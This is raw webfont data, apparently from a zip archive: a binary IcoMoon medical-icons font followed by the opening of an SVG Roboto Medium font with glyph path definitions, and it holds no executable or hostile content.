����*()*�e
"!	�	"#
#!

	e�1

�+��)
)*��%#"1!�

�!1"
	



%$�����-9Ncx=�!"3!2>54.#2#".54>3#".53%2#".54>3'2#".54>76.54>"&"./''.=.='7''".4?>727>2543666'.5<54.5<''.='./4.5<''.5<55'.54>77>7>54.'5>56y�1$$1�0$$0�!!!!3



d���

�Z 
!
:	
K		
	

q��
9

�zU				(�$0�0%%0�0$��""""�#))#��


						�N�bb``�PR
))
R
5(/,�	METJ+.&$0)HVCN��
U
	�

!2�
	


�1!'������!3?KWd������1>54.#*#353:3'4."''#5:632#35#535#35#%35#535#35#735#535#35#/#357335#3#".454>327.#"32>=#357#'#35135##'#!"3!2>54.#!!!!!!'2>7'#".54>327.#"3�

	

� 56!�Y 56!� 56!S�
	"B�$!��-##.�-$$-����
�	

	�	m+'-
!mmm3)mG**GmB	



		
+*C11D)DDm@@�#.�
.##-�.#����

���N




����Sh���)D_%!!2#".54>34>30:121#0*#"&=0*1"&=*1".='2#".54>34>30:121#0*#"&=0*1"&=*1".='2#".54>34>30:121#0*#"&=0*1"&=*1".=0" "1"3!2>54.#'46276"&/&>%7>2/"&57.7!".514>3!21#Rt��-				7



;				7



;				7



���)
())��&'
]
]	��]

]
&&

���
z

ar��A		H[wwww[H		H[wwww[H		H[wwww[T+��)

(*�/��/ooon
/��/�0x��
����#Vz����6Xo��
1H%>4'.'.3:63'813:>3>&'4.'.""':12>76.'.'".'&2232>7>.''>32>54.#"3:772>54.#"32232>7>7>&'.#";2>54.#>4'.'.3:634&4&'4.#32>5154.+";2>5!"3!2>54.##54.#"#54.#"#5#".'32>54.+5>7>&'.#".5<64?0>7>32'#32+32>54.#82012>54.'.#3"32>=4.#�%(	


	
�	


		
		
�		�$$� \%%�0$$0�0$$0��G/) 	>
6N_3?mR/+�
		
  �		�inc				C	|		�		S�$0�0$$0�0$�y�\(:	�	+M<$0Qn>$D<4�	

 !��

		%%
����-BWl�������)>S��!"3!2>76.#2#".7&>3'2#".4'64>3#".4'64>32'2#".'>32#".7&>3'2#".'>32#".7&>3'2#".'>3".7&>32##".7&>32'64>301".4'".'>32##".'>32'&>32#".7>32#".'".'1'75"2"2##".7"6&6#1>7#70242#7>?>232##'2&>73}�+!)�*!,�Q




	?cu
			�
N	
�i�
�� +�+  +�+ ��3C!��:(N�`PK��		�W{N
	������)Ef��3#77#33737#7!"3!2>'.#/.5>"7/.7&>7>7/>7>.'6&4&5".7&>#0##"."/*&'81'.*#"32>7>00*#".1!01df%'%%'/�/%#1�1$&/��	_

^

O
�		�
:
zx
y$
 ""7����	
	
O



		

<QQ�#{%%%%$0�0$$0�0$�U	

		
	k		
		

t
	

��"HC//CH"^56
	
		




�			�����#!"3!2>76.#2.':3323>7">7332>7">733:3#23>52>7#32>52>7#3#3#*#.#4.#"2.#4.#"2.#4.1*#.3.#"".3.#"".3.+'.7&>323">32z�1#%/�/%#1��@Zh'	

	

		5)g_?B
			





A+C)AJ(
'L?-B.�$1�1$$1�1$��,RsF/EQ"9./EQ"8/FsR,Z!

B=+E[\
!

B=+E[\
.8< A5!1;22;2"6A872		���<HTm����%.'5234.'5#.5#35>54.''.54>75!"3!2>54.#2#".54>32#".54>3>;2#'##7##7".54>32###".5<5##".5<5!5!<1".?>;235	#"


	$"

5#	
^�."".�.##.�
		

		
�;





}a"5�5"g4''44''4vG


			��r		v

�	#�(

	
	+
	
"P%".�."".�."�





	



	�|ffff|��'45''54'@��		
R_T

T_R
		5P`1D";+�
��D����2K��'.=>557>=4.'&7>54.'>7>666244"&"&5.'<54>7.'.&'5./754>7227>37>7z


��0$$0�0$$0�-)
	�


	
!.692,�$)./)#(	�
	0$A2'D\4M

		

�77�#1�1#%/�/%�)
	8�z%�'	*	.@Q*5ZF&	����)5N`u���"32>'6.#%"32>7.###33737#!"3!2>76.#3'>323#7".7&>32#".'>32#7#.#"#6.#"#".'&>3!2#3'�		�M				�UVTSTVv�1#%/�/%#1��	r�

�

�6#%�%#-		
U=


��9

		
	


	TUUUU�$1�1$$1�1$��
		
�
L$$$$
L	�e
g��	
���-����;P!"3!2>54.#2#".54>37>;2.'.>?'##>7>4'./7#&/.67<.'>7>7'.'.'>7.'.7'3202017'37'37'3732+".54>;7'#"!".54>70" "#".4154>3!2>;210#'".54>32#��1$$1�1$$1���%	
�	&X
	E4I5E	X0	
	

�		�

	

cS=W�



�

u_]r��
����	S	I	
%

�$1�1$$1�1$���j
		
j	
:
	.6,#





#,6.	
:
	Z 
	

G

G
  
 ��ZY__
_^	WV






	�		=	
	�

���-Vv��!"3!2>54.#2#".54>3%#".=4>;232#54.+"".=4>;232#!#+".54>;7>372!##33535#z�0%%0�0%%0�""""��p��o+o����
9
�{U�"���433433�$1�1$$1�1$��""""Z��
0�����:V	�"��}33443����Gs0" "1"3!2>54.#".'.54>732>7#%/!'5.5&>76*&'3!7����*)(
)�M40,
#3 *	$(+'F9)	.2EU/m
���)	��~1E�*��))*�j
,14$E=2))29+($->&.L6c�	�/T
�,����-BW���!"3!2>54.#2#".54>3'2#".54>3#2#".54>3#54./.=4>3234&4&5./.54>32<1#0#".5<1##".'4&</###".=##".=#7#"'.?>1307>130021:32#".5<1#0#".5<1#0#".5<5.'81"./#0#".5#5<>?>323<674>?>54.'54>32y�1$$1�1$$1�				�
		


�
		


n��	
	SR	�Y
'##'

E

X

i���	RS	
	�$0�1$$1�0$��				�	

		

		

		

	�,>

	��		�
	

	[
X	�	@37,,73XcR]]�ssss�^`//_	.:3/95	^RdW\�	

>	�	X
[	

	
�		�����!&s��0" "1"3!2>54.#!5!7#535#54.+".'.47.'.54>3"72;2'#".'.467>54.#5232#54.##53���*
())o�n�7###
_


'

_#
]8 -!#7&#*�##�+��)
)*�#jjjj|0

	
'$


	 0�#+

+7@@*"��jj����1F���0" "1"3!2>54.#2#".54>32#".54>3#".=###".5##".515##".=4040=4>;200#3./###".=##".=##'.?42<1>;2����*))*�




		
�I


		
�									�
	\++e
+MH



HM*
6	�	6�*��((*u

		



		

�a		���		��		ɰ		�
		
����
S�������"�	
�
		�
	
����M\0& ""3!2>54.##"&5".=462354623546235462.5#462����*
((
*�e

				
	
	
	�+&/&�
*��(

)*��		�a�
��������.�""""�{���3Rg����6�����*Nm>47&6&4'.302625'"32>'6.#4.#324203>'&>7>'6.'>2#0".1.'4&64764>74>32#1".'0"#".'4&4&7&>7>7"#".'4&4&74>7>7.2232>5646&5.#'32>7.#"!"3!2>'.##7#!7##7&>;'#".'72>'6.'&".7&646'7">5>323272>56&4&'.+"3"676.#*.'.467>#*.#4.5&<65>27#1".'4&4&74>32'""#".5&4&65>7623:>7>'6&4&'.:>5>&'.3' 	^%

	;8$,��0%#2�2#%0~'�d&�2H+g	#*2 ;+

_*D-�H�	'
%	���`�Q/3Qh4	UR<yJD�@��$1�0%%0�1$�q����!>1	
T*+:!# n,5��T�=RU	
5gR2X�IJ�/
����)>W��(=Rg|"32>54.#'"32>54.#7"32>54.#%!"3!2>54.##54./.=4>323<.'./.54>324>32#".5#5<>?>32346465>?>54.'54>32#35*#<5:3"32>54.#7"32>54.#'"32>54.#".54>32#Z		d						f�1$$1�1$$1�L��	
	SR	��(D[43\D''D\34[D(����	RS	
�;SS



�`/S>##>S//R>$$>R/)H55H))G66G)		A		�				�$1�1$$1�1$��>
	�	�		�
		\		X	�	�3[D((D[34[D((D[4�	�	
>	�	X		\		
�		�?SSB



W		�		�$>R//S>$$>S//R>$�W6H()H5  5H)(H6

����#.9DOZepty��!"3!2>54.#.11&>7&>7&>7.67.7.7.7!/%0#".'#".'.1.54>32>323'{�0$$0�0$$0�!%&&�Kq	

6ɣ�����
�M�			

		
		

	

	�5�c�$0�0$$0�0$�$!e# ^# ^#!"!#h!#^ #^ #����&�&�>		�'�����1EYv0" "1"3!2>54.#2#".54>3'.674>1'7.?'707'#5.?>;2'����*)(

)��&&&&Nc
S=?
�b><R
T�R�	}	�
�+��))+&&&&�-gS<>gg><S�WONT��
	���).3���57'>7'%&7'>54.5'575'54.'&".5"&>3>54.5362754.'.'.47".'.54>3564$5%>54..54>7'ø
/Rm>/,(����/-)�ea
/Rm?�$
%


?	?
	
$
����*))*�tO�i==i�OP�i==i�PqE�)+0?lS.�{	�Gb(..>nQ0��GEEG},*
	

		


!	


		&�
)��(
*,��>h�NQ�j<<j�QN�h>	����#(Ap`j"32>54.#3#553#53#553#5!"3!2>54.##5##5#".=#".5<6570>7>32.#*#.#".#"*#"32>732>7354>7>742041>5."&#"*.5&4>3>3:4.#"8181".'81811"1"&"&5.'"&*#""*1".5&<63>32:3>7.'#*&#+"""#*.'.467>;8126263.'.74>23>5.'.467>281232>7&4&454>324>7>2>7>2811*"1".1.'3>71>7>54.'>454.'35<5#?
		
		HHHHHHHH-�1$$1�1$$1�KH�/, (	?
6N`4>oR/+



		





			
		
	
		


		
		





			
	

�HH	

	��''7''n''�''�$1�1$$1�1$�w��))]!+T	�	+N<$0Rn?$D<5�
	
	

SX

	
	








		

		

W



��'����Al����!"3!2>76.#732+".'>;7'#"#'%"#>32#".'332>'6.##".'>32'!!".'332>'6.#"#>32#.""23>2202032>'6.#y�1#%/�/%#1��}�		�			t`\s	
	>�h/6@!5ZF&&FZ592-|	#?--?#_�����;o[J~0<B%8fJ,,Jf8)G@2L1GatBO�i>>i�ON)&)%$%�$1�1$$1�1$�Q




l\
	, (D[44\D($.>$#>/�


		
�11��">W3- ,Kd:9eK+&6 :bG(>i�PQ�j=�����-:GTav�����$1p�!"3!2>76.##".'>32'#52>7'7'>''7'>&''7'>&''2#".'>3'6.'7.'6.'>2#".'>3#".':3#".'6&6&3##7#2#".7&6&6'>30:3332>7.'72>':324.'6#".7'##".'##".7##".'7&>;2.5'##7#'.457>#3"x�1$&/�/%#1		

		,
3	
=
J	
r		�
	-
%		;

	
\			

	



H
	�$/�/$&]&�$0�0$$0�0$�A

	

	�
	?


2
	"

		



		�	4
)
	

	
l�).%��%.))1+	44	+1)�	
��

��
		
*��
		
�

�		Ĭ|��|�		�����-3!"3!2>54.#2#".54>3#".5<1#!#0#".5<54>3:354.7>3>45<15>70+8+";2+";2+";2>54.+".54>;2>54.+".54>;>7>&'&"153026.'.'5:32o�0$$0�0$$0��))((#



)��(



)6!(





	




��

���

��

�	


)#4'�$0�0$$0�0$V)(()�



doY��yYod




duh4&j
	68+�
	








�+86	
h&4hud

����|�AKs����32>=#0".50.'1#".50.'10#&"&50.'*1*.50.'1#".50.'10#&"&'0.'*#3'3220>14>320>14>320:1020>16462720>1>32354.+"1!"3!2>54.#232>54>32#54.#"#".54>32!5!%301##>181#0.54>12#".54>332+".54>35!#4>312!54>32#!!��
		
#
	
�
	�1$$1�1$$1�				

h	�er��A		
K

/I		I		,��C	
X		BB��@	
)		
			
	(
	W	#"	
	#"	$`


`#$1�1$$1�1$�	
��		

��l��


�

u				��qq�		�
		
���	������7C\s������
2>54.#"3'2762#*&#.4'54>33535#5##3%!"3!2>54.#2.#"'>3#".54>32>;2#'##7##7!2!52#".54>3".54>32#+".54>;2#5!#4>312!54>32�

)5]#�1$$1�1$$1��	0







�	^
	))�))ys	�d�''''8
		


3	I

I	
B��C	
Y		�

�0>�%0�0$$0�0%l2		1	{







h
		
�gggg��	l��''''�)				�qq�

�		��
����-BG}!"3!2>76.#".7&>32#"32>'6.##'33#7&>7>&'.#"+&>7>}�+!)�*!,�{J�a::a�JL�d88d�L;fM++Mf;:gK..Kg:*RTTT


P
%27
� *�*  *�* ��9c�KK�b99b�KK�c9�,Lg::gL--Lg::gL,��UU		S	 ':(-02	����)>Sh�������)>Sh}���*&"2>7>.''>7>.'.3>7>.'.'>7>.'.27>4'.!"3!2>54.#>&'.672#".54>3#.7>3'>&'.67>'".52'.5>.'&4>7>'>&'.47&'.47>'>2"&'.467>2&'.467'>".'.>7#"./#4>?>7>'.'&4>7627&'.47>#".5<1##5###0#".5<54>3:3267>4'.�-;/%�0$$0�0$$0��.



F
)�! �?	'�/'$
�	

aa	
	(
=E=&��/��$0�0$$0�0$xC



��73p�M4lu !ù2s�		�

Fj

R6�			JRB��ddqBRJ			IWM&&MWIB
����!&+05:mr��0" "1"3!2>54.#'7'77'7'7'?''77"#".54>32#".'.'.#'7#".54>3232>=4>54.#"#".54>32'7����)
())�&%�A]]/]]-\]�]]?]]	/@$&C3
"�\]u#..$	

(0( 6J)-'"		

*F_54]D(
7&&�+��)

(*�&&��]].]\�]]�]\]]�



$@00@%
	

�]]F%&+8,!".

>0E?E/*J6 			5\E()F]5$ p&%����%!"3!2>54.###5#53533w�1$$1�1$$1?�������$1�1$$1�1$��������
	���-CP����	t��!"3!2>54.#2#".54>3"10".'.53%!'5!!5!0*1"./##0*&1.4?5#1#0*1.450>1>130010*1".5'1#4>32#".5#".54>32#".54>32#<54>3:3237>130!#".54>7'.467>237>;2132>54.'502>7>52#5##".54>32#<54>3:32~�1$$1�1$$1d8�od��:���&&&
F
&h



��5�'***��IY^B,	

�
�6��$1�1$$1�1$�~

	��r}}������UK

KU�&

� 		�!!r

r�Y^B66��	��!!����	8Mbw����$3#'73#737##";.>72" "3"3!2>'.#23".'>32#".7&>#"'.>7>#2'>#2".'.67&>323"#".7#".'7&>72>73.'.3"'".3">7'"#24>7>2>23"#!3'7'7#7733#7'3#'fA??A�\�&�

������)))
)��

	



	0	

Q


	3

1�
1=1V	



	
	

.�wYTw.	���BA$9777$?Ax?AA?m���QQ��*��
	
	.*��(
(
*.�F��
	


�e�	3��

,Z


	
u��30*SXXS)02���QQ		����-BW:Z�,d!"3!2>76.#2#".7&>3'2#".'>3'2#".7&>37>;27>#3""2#:32#".7&6&6+"#".'6&6&3#2#".7&6&6'.#"2"2#.7'#"#".'6&6&3#2#".7&6&6+1"#*.'"4&6/###".7'##".'7#7#'.7"./32>71#!".'.'7"242#.'*1*'3''>32'>7""374:3:2>7"6"2'7>7##%#".'.'.'.#".'"4&4#>7:612:332>7'.'0*#*'7.'7.'"4&4#>32z�1#%/�/%#1�
		
�





�

!S
n
#			

!

! 1+	,1 

! $#'<,()


	,()




#$&w%%" !""$ ! 




"%%�$0�0$$0�0$���				��v::u
9F>"$$"9F@rcyk		>C66C>		kycpqƌ����r�	

@Zxx
@ZxwY@


		

	�xx\@

����)0" "1"3!2>54.###5#53533����)
())<�������+��)

(*������������i!"3!2>76.##".6746&6'.#"#".'&<6'.7>7632>w�1#%/�/%#1�

	
+--/+-�$1�1$$1�1$��"*5##?12<$$<21?##5*"8<@%		%@<8
����.Q`4.#*#:32>5!"3!2>54.#6:32#*##!".5#!".=![!!+��*  *+  +���7))7
����m
= 
� � +��*  *+ ��'56'

9�]

����
&=0354.1!"3!2>54.##54.10#757
B

p�1$$1�1$$1N���_`�v55?$1�1$$1�1$��|  |^���^������AF[�!"3!2>54.#732+".54>;7'#"#55!!%4>32#".5#0*#".5<5462>54.'#0<5&>361v�1$$1�1$$1���



�	
u_]r
�o��	





	�v�z	-6-4W@$$@W4�	T�qB�$0�0%%0�0$�""





	\�11�







��
"&!K;Re88eR;U"+&
	6h�Rm�n����$;Pgl3737#7##3%!"3!2>76.#2.#"'>3#".7&>32>;2#'#!7##7!7!�!��2#%0�0%#2��)-(8
7*)*f$&&$��(�'9S&#��$&U:>�
���$0�0$$0�0$tj

f�$$%%��~~~~���HH����-DY���!"3!2>54.#2#".54>3>;2#'##7##7%2#".54>3.'1#".50<&54>?>1/0&4676210".1'&'.1.''7!"1'0>7>3!u�1$$1�1$$1�





�w,6 �6+��
		




)

&
	


7	
�zy���&( $.)d�%0�1$$1�0%�





��nnnn��


		


��
�$]S9


_ue�
	

#f
 qqP#%#,(/
����)>Sh��,G"3>56.''"32>54.#72>54.#"3'"32>54.#"32>54.#!"3!2>54.#!0>767>27>27>27>21%!57>4&'.#7>4&'.'>4&'."4.'."#".54646570>7>32'"32>54.#7#32+32>54.#3		%	�				�		,�0$$0�0$$0����		�		��		��		�
m		l���&	?
6N`3>nR/+�"



  	2#�				�		A$0�0$$0�0$�{QbR
�		��		��		�
m		m��S
&	�	*N<#/Rm>$D<4�	

  �L�~_<�δgδg�����������0�67!��	�����[�:<�478������[����	
��7���]
����b	/`������
��gs���

	����		�
���
��
		��	
��

�	��
	�
			�

�����
�N� `��	�
P<
�xfP��<D��p4�ZH� �"�$%:&J',(�)�+�,p-�-�123�4�5B6H9:<=R?X@�A D EE.GH�KTKrMMxM�N
N�O<O�QQRR�S�UHV0W,Y|Z�[\\]�^F`*a�b�c�e�f�g>h h�i�kk�mm�n�o�p�p�qpsbt�vJy4{�|�~j����„��<�v�R�x��<� �*�В
���L����>���L�R���F�ު`���v��4���n�*�*@*�*j
(�	*	�	*@	*�	*	*	
(�webfont-medical-iconsVersion 0.0webfont-medical-iconswebfont-medical-iconswebfont-medical-iconsRegularwebfont-medical-iconsGenerated by IcoMoonPK!N6^�XXAit_sanctum/fonts/roboto_medium_macroman/Roboto-Medium-webfont.svgnu&1i�<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd" >
<svg xmlns="http://www.w3.org/2000/svg">
<metadata></metadata>
<defs>
<font id="robotomedium" horiz-adv-x="1160" >
<font-face units-per-em="2048" ascent="1638" descent="-410" />
<missing-glyph horiz-adv-x="510" />
<glyph unicode="&#xfb01;" horiz-adv-x="1192" d="M24 902v180h165v92q0 195 115 301t322 106q72 0 143 -15.5t163 -44.5l-37 -201q-62 21 -122 34.5t-130 13.5q-109 0 -160 -48.5t-51 -145.5v-92h213v-180h-213v-902h-243v902h-165zM804 0v1082h243v-1082h-243z" />
<glyph horiz-adv-x="2048" />
<glyph horiz-adv-x="2048" />
<glyph unicode="&#xd;" horiz-adv-x="510" />
<glyph unicode=" "  horiz-adv-x="510" />
<glyph unicode="&#x09;" horiz-adv-x="510" />
<glyph unicode="&#xa0;" horiz-adv-x="510" />
<glyph unicode="!" horiz-adv-x="549" d="M154 0v234h243v-234h-243zM154 491v965h243v-965h-243z" />
<glyph unicode="&#x22;" horiz-adv-x="664" d="M66 1038v524h214v-275l-102 -249h-112zM384 1038v524h214v-275l-102 -249h-112z" />
<glyph unicode="#" horiz-adv-x="1250" d="M60 410v158h261l58 313h-243v159h273l78 416h167l-78 -416h224l78 416h168l-78 -416h208v-159h-238l-58 -313h221v-158h-251l-76 -410h-167l76 410h-225l-76 -410h-167l76 410h-231zM488 568h225l58 313h-225z" />
<glyph unicode="$" horiz-adv-x="1164" d="M105 438l2 5h236q0 -142 69.5 -203t173.5 -61q111 0 172 54t61 147q0 85 -55.5 141t-185.5 102q-211 72 -316.5 173.5t-105.5 276.5q0 166 101 273t274 127v218h160v-220q171 -26 267.5 -146.5t96.5 -319.5h-242q0 125 -56 198t-154 73q-102 0 -153 -54.5t-51 -146.5 q0 -86 53.5 -140t192.5 -103q211 -76 314 -176t103 -274q0 -173 -105 -276t-287 -122v-195h-159v194q-179 19 -294.5 129.5t-111.5 325.5z" />
<glyph unicode="%" horiz-adv-x="1504" d="M100 1099v77q0 128 82.5 214.5t225.5 86.5q144 0 226.5 -86t82.5 -215v-77q0 -128 -82.5 -213.5t-224.5 -85.5q-144 0 -227 85.5t-83 213.5zM269 1099q0 -64 36.5 -108.5t104.5 -44.5q66 0 101.5 44t35.5 109v77q0 65 -36.5 110t-102.5 45q-67 0 -103 -45t-36 -110v-77z M335 181l711 1138l125 -72l-711 -1138zM800 279v78q0 127 83 213.5t225 86.5q144 0 226.5 -86t82.5 -214v-78q0 -129 -82.5 -214.5t-224.5 -85.5q-144 0 -227 86t-83 214zM969 279q0 -64 37.5 -109t103.5 -45q70 0 104 43.5t34 110.5v78q0 64 -36.5 109t-103.5 45t-103 -45 t-36 -109v-78z" />
<glyph unicode="&#x26;" horiz-adv-x="1309" d="M62 393q0 120 68 208.5t204 178.5q-73 95 -109 172t-36 157q0 171 103 269.5t278 98.5q159 0 258.5 -95.5t99.5 -230.5q0 -98 -51.5 -174.5t-145.5 -145.5l-100 -72l305 -362q40 63 62.5 138t22.5 159h197q0 -137 -36.5 -252t-110.5 -205l196 -232l-2 -5h-274l-81 95 q-82 -57 -175.5 -86.5t-197.5 -29.5q-217 0 -346 115t-129 299zM305 401q0 -100 63 -164t176 -64q62 0 123 18t116 53l-328 387l-30 -22q-72 -56 -96 -108t-24 -100zM417 1112q0 -48 24.5 -99t72.5 -113l114 76q57 37 76.5 77.5t19.5 89.5q0 54 -42.5 96.5t-111.5 42.5 q-74 0 -113.5 -49t-39.5 -121z" />
<glyph unicode="'" horiz-adv-x="346" d="M66 1028v532h214v-249l-102 -283h-112z" />
<glyph unicode="(" horiz-adv-x="695" d="M128 576v16q0 394 156.5 670.5t338.5 361.5l6 -1l45 -134q-134 -102 -229.5 -327t-95.5 -568v-20q0 -343 95 -568t230 -334l-45 -128h-6q-183 86 -339 362t-156 670z" />
<glyph unicode=")" horiz-adv-x="700" d="M17 -328q133 102 229 330t96 572v20q0 340 -98.5 568.5t-226.5 332.5l46 129h6q182 -84 342 -364t160 -668v-16q0 -389 -159.5 -668t-342.5 -364h-6z" />
<glyph unicode="*" horiz-adv-x="895" d="M27 1061l53 169l296 -117l-13 343h174l-15 -350l291 115l53 -171l-303 -88l195 -266l-141 -105l-177 287l-174 -279l-143 102l202 271z" />
<glyph unicode="+" horiz-adv-x="1141" d="M68 579v222h382v405h236v-405h380v-222h-380v-433h-236v433h-382z" />
<glyph unicode="," horiz-adv-x="462" d="M54 -281l70 321v198h239v-207l-155 -312h-154z" />
<glyph unicode="-" horiz-adv-x="672" d="M71 521v196h525v-196h-525z" />
<glyph unicode="." horiz-adv-x="572" d="M153 0v233h242v-233h-242z" />
<glyph unicode="/" horiz-adv-x="839" d="M2 -125l573 1581h223l-573 -1581h-223z" />
<glyph unicode="0" horiz-adv-x="1164" d="M104 561v333q0 283 128 433t349 150q220 0 349 -150t129 -433v-333q0 -284 -128 -433t-348 -149q-221 0 -350 149t-129 433zM347 526q0 -180 60.5 -266.5t175.5 -86.5t174 86t59 267v405q0 179 -60 265t-175 86t-174.5 -86t-59.5 -265v-405z" />
<glyph unicode="1" horiz-adv-x="1164" d="M179 1225v179l539 52v-1456h-243v1225h-296z" />
<glyph unicode="2" horiz-adv-x="1164" d="M87 1018q-5 194 127 326.5t362 132.5q210 0 332 -116t122 -303q0 -125 -70.5 -239t-218.5 -277l-324 -342l3 -6h656v-194h-967v167l474 517q116 127 160 208.5t44 159.5q0 98 -57 164t-154 66q-128 0 -190 -72t-62 -198h-235z" />
<glyph unicode="3" horiz-adv-x="1164" d="M86 384l2 6h234q0 -97 65 -157t173 -60q113 0 178 61t65 173q0 123 -59.5 181.5t-184.5 58.5h-169v191h169q118 0 170 58.5t52 165.5q0 105 -56 162.5t-165 57.5q-99 0 -161.5 -56.5t-62.5 -148.5h-234l-2 6q-6 167 124.5 280.5t332.5 113.5q213 0 340 -108t127 -307 q0 -93 -57 -180t-162 -135q124 -44 182.5 -134t58.5 -205q0 -200 -137.5 -314.5t-351.5 -114.5q-202 0 -339.5 107.5t-131.5 297.5z" />
<glyph unicode="4" horiz-adv-x="1164" d="M56 472l623 984h250v-937h184v-196h-184v-323h-242v323h-625zM296 519h391v591l-6 2l-20 -43z" />
<glyph unicode="5" horiz-adv-x="1164" d="M135 384l2 5l227 8q0 -106 62 -165t161 -59q113 0 172.5 79.5t59.5 210.5q0 132 -61 214.5t-174 82.5q-100 0 -148.5 -32.5t-70.5 -93.5l-209 17l84 805h769v-210h-567l-44 -365q43 32 99.5 52.5t127.5 22.5q205 2 321 -130t116 -361q0 -214 -122 -350t-353 -136 q-192 0 -324.5 105.5t-127.5 299.5z" />
<glyph unicode="6" horiz-adv-x="1164" d="M116 571v278q0 284 160.5 456t403.5 172q78 0 150 -16.5t129 -43.5l-46 -188q-56 24 -109 37.5t-123 13.5q-146 0 -234.5 -112.5t-88.5 -303.5v-7q60 55 139.5 85t174.5 30q195 0 308.5 -136.5t113.5 -347.5q0 -223 -130 -366t-341 -143q-222 0 -364.5 156t-142.5 436z M358 558q0 -185 74.5 -285t190.5 -100q106 0 167 91t61 224q0 131 -64 213t-175 82q-92 0 -156 -32.5t-98 -88.5v-104z" />
<glyph unicode="7" horiz-adv-x="1164" d="M69 1261v195h1006v-195q-251 -295 -339 -532t-128 -575l-15 -154h-243l15 154q39 330 156 598.5t319 508.5h-771z" />
<glyph unicode="8" horiz-adv-x="1164" d="M97 397q0 120 69.5 212t190.5 139q-104 44 -163 128.5t-59 195.5q0 194 122.5 299.5t323.5 105.5q199 0 323.5 -105.5t124.5 -299.5q0 -110 -60 -195t-163 -130q119 -46 189.5 -138t70.5 -212q0 -203 -134 -310.5t-349 -107.5q-218 0 -352 107.5t-134 310.5zM340 409 q0 -110 66 -173t177 -63q107 0 174 63.5t67 172.5q0 107 -68.5 174t-174.5 67q-108 0 -174.5 -66.5t-66.5 -174.5zM378 1063q0 -99 55.5 -158.5t149.5 -59.5q92 0 147.5 59.5t55.5 158.5q0 96 -57 157.5t-148 61.5q-94 0 -148.5 -59.5t-54.5 -159.5z" />
<glyph unicode="9" horiz-adv-x="1164" d="M82 974q0 218 135 360.5t334 142.5q226 0 361 -148.5t135 -427.5v-341q0 -276 -148.5 -428.5t-383.5 -152.5q-75 0 -155 15t-147 45l32 186q61 -28 125 -40t145 -12q130 0 210 96.5t80 281.5v67q-49 -67 -119.5 -101.5t-154.5 -34.5q-208 0 -328.5 131.5t-120.5 360.5z M325 974q0 -136 60.5 -219.5t168.5 -83.5q91 0 155 36t96 93v130q0 173 -65 262.5t-185 89.5q-98 0 -164 -87.5t-66 -220.5z" />
<glyph unicode=":" horiz-adv-x="549" d="M153 0v233h242v-233h-242zM153 876v233h242v-233h-242z" />
<glyph unicode=";" horiz-adv-x="544" d="M105 -281l70 321v198h239v-207l-155 -312h-154zM154 876v233h242v-233h-242z" />
<glyph unicode="&#x3c;" horiz-adv-x="1041" d="M63 458v193l837 372v-242l-578 -222l-19 -3v-6l19 -3l578 -218v-243z" />
<glyph unicode="=" horiz-adv-x="1166" d="M145 366v201h862v-201h-862zM145 790v202h862v-202h-862z" />
<glyph unicode="&#x3e;" horiz-adv-x="1066" d="M128 86v239l605 226l18 2l1 6l-19 4l-605 221v239l864 -372v-193z" />
<glyph unicode="?" horiz-adv-x="996" d="M47 1100q-3 178 119.5 277.5t316.5 99.5q210 0 327.5 -107t117.5 -297q0 -127 -73.5 -235.5t-185.5 -198.5q-57 -50 -71.5 -95t-14.5 -132h-243q1 143 33 204.5t142 154.5q78 76 124 145.5t46 153.5q0 97 -52.5 150.5t-149.5 53.5q-83 0 -141 -45.5t-58 -134.5h-234z M339 0v233h248v-233h-248z" />
<glyph unicode="@" horiz-adv-x="1825" d="M91 478q18 424 252 685t613 261q383 0 587 -246t188 -671q-9 -216 -124 -372t-344 -156q-75 0 -129.5 42t-78.5 119q-47 -80 -116 -119.5t-161 -39.5q-133 0 -204.5 119.5t-53.5 315.5q24 256 140.5 411t282.5 155q110 0 177.5 -26t147.5 -80l-3 -4h5l-51 -579 q-8 -101 18 -139t69 -38q119 0 190.5 110.5t79.5 280.5q16 367 -140 572t-484 205q-306 0 -489.5 -221t-198.5 -585q-18 -365 147.5 -575t475.5 -210q87 0 177 20t154 53l38 -130q-67 -42 -170.5 -65.5t-202.5 -23.5q-387 0 -598 249.5t-194 681.5zM721 416 q-10 -133 20 -202t99 -69q59 0 109 24.5t89 87.5q0 8 0.5 16t1.5 20l45 515q-23 9 -49 14.5t-54 5.5q-118 0 -180 -102.5t-81 -309.5z" />
<glyph unicode="A" horiz-adv-x="1320" d="M16 0l535 1456h230l529 -1456h-247l-115 340h-570l-116 -340h-246zM448 543h431l-211 622h-6z" />
<glyph unicode="B" horiz-adv-x="1312" d="M159 0v1456h484q242 0 378 -99.5t136 -297.5q0 -99 -57 -177t-158 -116q130 -29 200 -125t70 -223q0 -205 -134 -311.5t-370 -106.5h-549zM402 194h306q126 0 194 57.5t68 166.5q0 116 -57 180t-178 64h-333v-468zM402 843h268q113 0 178.5 53.5t65.5 151.5 q0 108 -69 160.5t-202 52.5h-241v-418z" />
<glyph unicode="C" horiz-adv-x="1302" d="M106 589v277q0 266 157.5 438.5t409.5 172.5q259 1 407 -135q145 -132 144 -353v-12l-2 -6h-235q0 147 -79.5 229t-234.5 82q-149 0 -236.5 -118t-87.5 -296v-279q0 -180 89.5 -298t241.5 -118q151 0 229 81t78 229h234l2 -6v-12q1 -213 -143 -347q-148 -138 -400 -139 q-255 0 -414.5 171.5t-159.5 438.5z" />
<glyph unicode="D" horiz-adv-x="1346" d="M159 0v1456h472q277 0 450.5 -173t173.5 -445v-221q0 -273 -173.5 -445t-450.5 -172h-472zM402 194h222q181 0 284.5 118t103.5 305v223q0 185 -103.5 303t-284.5 118h-222v-1067z" />
<glyph unicode="E" horiz-adv-x="1187" d="M159 0v1456h975v-195h-732v-411h637v-195h-637v-461h739v-194h-982z" />
<glyph unicode="F" horiz-adv-x="1188" d="M159 0v1456h983v-195h-740v-445h638v-195h-638v-621h-243z" />
<glyph unicode="G" horiz-adv-x="1383" d="M110 576v304q0 264 160.5 430.5t414.5 166.5q257 0 399.5 -126.5t145.5 -329.5l-2 -6h-230q-8 120 -85.5 193.5t-224.5 73.5q-151 0 -243.5 -113t-92.5 -287v-306q0 -176 100.5 -289.5t260.5 -113.5q114 0 185 26.5t103 62.5v296h-289v182h532v-543 q-58 -83 -190.5 -150.5t-340.5 -67.5q-263 0 -433 166.5t-170 430.5z" />
<glyph unicode="H" horiz-adv-x="1456" d="M159 0v1456h243v-640h652v640h242v-1456h-242v621h-652v-621h-243z" />
